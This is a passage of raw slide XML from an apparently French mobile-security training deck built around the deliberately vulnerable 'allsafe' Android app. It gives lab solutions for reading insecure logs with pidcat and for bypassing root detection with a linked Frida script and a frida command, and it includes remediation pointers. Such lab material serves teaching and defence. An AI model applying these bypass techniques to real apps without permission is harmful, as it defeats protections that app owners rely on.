                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Option 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>pidcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/JakeWharton/pidcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pidcat</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infosecadventures.allsafe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Option 3 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> for all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>log.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Labs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Exercice 2 : Exploiting Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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539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a:t>Exercice 2 : Exploiting Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58370" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.20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1974850"/>
            <a:ext cx="965200" cy="96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3383121492"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3377247" y="32831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 $ 1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" baseline="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>000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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9A6A63-FE52-49BB-8AB8-B017B6D6F402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3376753560"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5655627" y="5607235"/>
          <a:ext cx="3266159" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3266159">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Total : $ 1500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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316034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800" b="1" dirty="0"/>
              <a:t>Mission Briefing : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>The application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> by a root-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> installation in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>unsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>rooted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>. Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>touching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/source code ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>MSTG - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> Root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> (MSTG-RESILIENCE-1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>/OWASP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0" err="1"/>
              <a:t>owasp-mstg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" u="sng" dirty="0"/>
              <a:t>/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md</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3 : Root Detection Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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29" y="5413338"/>
            <a:ext cx="915635" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" err="1"/>
              <a:t>Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4063144" y="5413338"/>
            <a:ext cx="924163" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Frida</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410156" y="5413338"/>
            <a:ext cx="1120820" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Bounty :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.20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156" y="5344004"/>
            <a:ext cx="508000" cy="50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5922630"/>
            <a:ext cx="505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>NA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F38EB03B-426F-4C35-817B-4DCD81FB020E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="49870" t="4590" r="2665" b="64936"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="498449" y="5922630"/>
            <a:ext cx="1096963" cy="528915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1886284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fr-FR" sz="1800" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> Frida script :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gist.github.com/pich4ya/0b2a8592d3c8d5df9c34b8d185d2ea35</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Command :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root_bypass.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infosecadventures.allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --no-pause</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Exercice 3 : Root Detection Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"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0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600" b="1" dirty="0"/>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>remediate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>SafetyNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Attestation API : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>developer.android.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/training/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>safetynet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/attestation</a:t>
            </a:r>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Exercice 3 : Root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Bypass [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>
</a:t>
            </a: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ool&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DB72C8-68AE-44EB-8C95-BD0880784DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="21667" r="22639"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434874" y="4457700"/>
            <a:ext cx="2274252" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957463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dirty="0"/>
              <a:t>And …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2594726" y="2940049"/>
          <a:ext cx="3747381" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3747381">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1822739905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>What about iOS ?</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="Stickers sur le thème Question Emoji | Redbubble">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1886D4-46CE-6586-86BF-F9B7387D1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558" y="3710562"/>
            <a:ext cx="1069716" cy="106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10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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0"/>
              <a:t>Option 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0"/>
              <a:t> Objection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0" err="1"/>
              <a:t>Preqreuistes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0"/>
              <a:t> :</a:t>
